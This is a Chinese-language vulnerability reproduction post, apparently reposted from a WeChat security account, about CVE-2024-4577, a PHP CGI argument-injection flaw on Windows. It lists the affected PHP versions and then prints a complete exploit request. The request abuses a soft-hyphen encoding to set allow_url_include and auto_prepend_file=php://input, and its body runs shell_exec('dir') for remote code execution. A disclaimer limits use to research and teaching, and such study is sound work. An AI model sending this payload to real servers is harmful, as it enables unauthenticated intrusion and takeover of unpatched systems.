漏洞概述
PHP程序语言在设计时忽略Windows操作系统内部对字元编码转换的Best-Fit特性,导致未认证的攻击者可透过特定的字元序列绕过旧有CVE-2012-1823的保护;透过参数注入等攻击在远端PHP服务器上执行任意代码。
建站集成软件包XAMMP Windows版本(使用语系为繁体中文950、日文932、简体中文936)默认配置下受该漏洞影响。
影响版本
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
漏洞复现
GET
/test.php?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp://input
HTTP/1.1
Host
: xxx.xxx.xxx.xxx
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept
: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Connection
: close
Content-Length
: 31
echo
shell_exec(
'dir'
);
原文始发于微信公众号(night安全):【漏洞复现】PHP CGI参数注入RCE漏洞(CVE-2024-4577)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论